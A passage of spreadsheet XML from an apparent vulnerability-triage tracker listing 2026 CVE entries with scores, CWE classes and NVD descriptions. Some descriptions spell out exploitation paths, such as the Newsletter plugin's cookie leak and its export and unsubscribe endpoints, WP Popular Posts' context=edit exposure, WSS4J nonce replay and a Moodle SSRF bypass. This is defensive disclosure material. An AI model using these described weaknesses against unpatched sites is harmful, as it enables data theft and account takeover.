      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor that fails to escape room_num, floor, and comment field values in input attributes. Attackers can induce authenticated back-office users to submit crafted POST requests with malicious payloads to execute arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103589</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103590</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>QloApps through 1.7.0 contains a reflected cross-site scripting vulnerability in the back-office room type editor's length of stay fields. Attackers can induce authenticated administrators to submit crafted POST requests with malicious payloads in restriction_min_los and restriction_max_los parameters, executing arbitrary JavaScript in the victim's administrative session.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103590</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12241</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>The Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improperly secure capability check on the 'save_meta_boxes' function in all versions up to, and including, 2.51. This makes it possible for authenticated attackers, with Contributor-level access and above, to create AWS labels that are rendered without proper escaping. The vulnerability was partially patched in version 2.46.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12241</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103241</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in vllm-project vLLM up to 0.26.0. This vulnerability affects unknown code of the file rust/src/parser/src/unified/gemma4.rs of the component Gemma4UnifiedParser. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. Upgrading to version 0.29.1rc0 is able to resolve this issue. This patch is called 3439bad37e68ba9755a46f4f6b44a4aeaf1f60a9. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103241</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103396</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>bbs-go through 4.4.6 contains a permission bypass vulnerability in the AdminMiddleware authorization logic where the read-only dashboard.user.view permission rule matches the /api/admin/user/synccount endpoint before the intended dashboard.user.update rule. Authenticated users with only view permissions can call the synccount endpoint to trigger expensive full-table user recounts and cache invalidations, causing denial of service through repeated concurrent database operations.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103396</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103532</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in immich-app Immich up to 2.7.5. This affects the function checkSharedLinkAccess of the file server/src/utils/access.ts of the component Shared Link Preview Handler. The manipulation of the argument Password leads to improper authorization. The attack may be initiated remotely. The reported GitHub issue was closed with the label "duplicate".</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103532</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92537</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>The Newsletter – Send awesome emails from WordPress plugin for WordPress is vulnerable to Insufficiently Protected Credentials in all versions up to, and including, 9.3.9 The plugin's public click-tracking REST route `/tnp/l/` is registered with `permission_callback =&gt; '__return_true'` and, upon receiving a valid keyed-MD5 signature, calls `set_user_cookie()`, which emits a `Set-Cookie: newsletter=&lt;id&gt;-&lt;raw_token&gt;` response header to the requester because the subscriber object loaded via `get_user()` lacks the `_trusted` property, causing `get_user_key()` to return the raw token column value instead of its MD5-masked variant. This makes it possible for unauthenticated attackers who obtain any signed click-tracking URL for a target subscriber to receive that subscriber's permanent raw authentication cookie, which they can then use to export the subscriber's full PII record via the JSON profile-export endpoint (`?na=px`), rewrite the subscriber's stored profile (`?na=ps`), and silently unsubscribe the subscriber via the RFC-8058 one-click endpoint (`?na=ocu`), none of which require a nonce, password, or email challenge. Signed tracking URLs are embedded in every external link of every newsletter delivered to a subscriber, carry no timestamp, and never expire until the site's relink key rotates, meaning that any party who observes such a URL — through a forwarded email, a shared inbox, a mail-gateway log, or Referer headers on the redirect target, which has no Referrer-Policy set — can replay it indefinitely to obtain the victim's credential.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92537</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92548</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>The WP Popular Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.4.2 via the 'context' parameter. This makes it possible for unauthenticated attackers to extract sensitive edit-context fields — including raw title, raw content body, password, meta, status, and guid — from non-public post objects such as wp_block synced patterns that WordPress core itself refuses to expose to unauthenticated callers. This is possible because the plugin's REST route is registered with a permission_callback of __return_true and passes the caller-supplied context parameter (e.g., context=edit) directly to WP_REST_Posts_Controller::prepare_item_for_response() without invoking get_item_permissions_check() or check_read_permission(), while the underlying query accepts an arbitrary post_type value without enforcing public or show_in_rest visibility flags.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92548</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93547</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>maven</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>A missing authorization check in the Vaadin Spreadsheet component allows an authenticated user of an application that renders a spreadsheet to add or replace cell comments on a sheet that has protection enabled, including on cells that are locked. Writing a comment to a cell that does not exist yet also creates the row and the cell.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.1.0 - 23.6.13
Vaadin 24.0.0 - 24.9.21
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Vaadin Framework 7 and 8 with the Spreadsheet add-on 2.0.0 - 3.1.0
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.22
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Upgrade the Spreadsheet add-on to 3.1.1
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet-flow 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-spreadsheet-flow 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin-spreadsheet-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-spreadsheet-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-spreadsheet-flow 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet 2.0.0 - 3.1.0 &gt;=3.1.1</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93547</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97246</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in ShortPixel Image Optimizer &lt;= 6.5.5 versions.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97246</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92899</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Apache WSS4J remembers the Nonce of each UsernameToken it accepts, so a captured token cannot be reused. It stored the Nonce as raw base64 text, but authentication decodes that text and uses the bytes.The same bytes can be written as base64 in several ways. An attacker who captured an authenticated request could re-send it with a space added to the Nonce: the password digest still verified, but the token no longer matched the remembered one, so the replay was accepted. Since a UsernameToken does not cover the message body, the captured token could then be reused on requests of the attacker's choosing until it expired. Affects deployments with a nonce replay cache configured, as Apache CXF has by default, and only tokens using a password digest. The cache is now keyed on the decoded Nonce. Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92899</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102107</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core contains a business logic flaw in a Kiteworks file-request feature allowed an authenticated user to send a request that appeared to originate from another user, because the server did not verify that the requester was authorized to act as the specified account. This could be used to solicit files or information from a recipient under a trusted identity; exploitation requires the feature to be enabled for the attacker's profile and the targeted recipient to act on the request.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102107</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102090</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.1 is vulnerable to Content Injection. A URL parameter in the PDF viewer was insufficiently validated, allowing an attacker-controlled document to be loaded and displayed under the trust of the legitimate application domain. This could increase the credibility of phishing attempts relying on malicious links embedded in the displayed content.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102090</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102577</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Incorrect handling of IPv4-mapped IPv6 addresses within the URL downloader's host-blocking logic allows an authenticated remote user to bypass blocked-host restrictions. By supplying a crafted URL, an attacker can induce the server to make requests to restricted destinations, leading to Server-Side Request Forgery (SSRF).</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102577</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103542</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
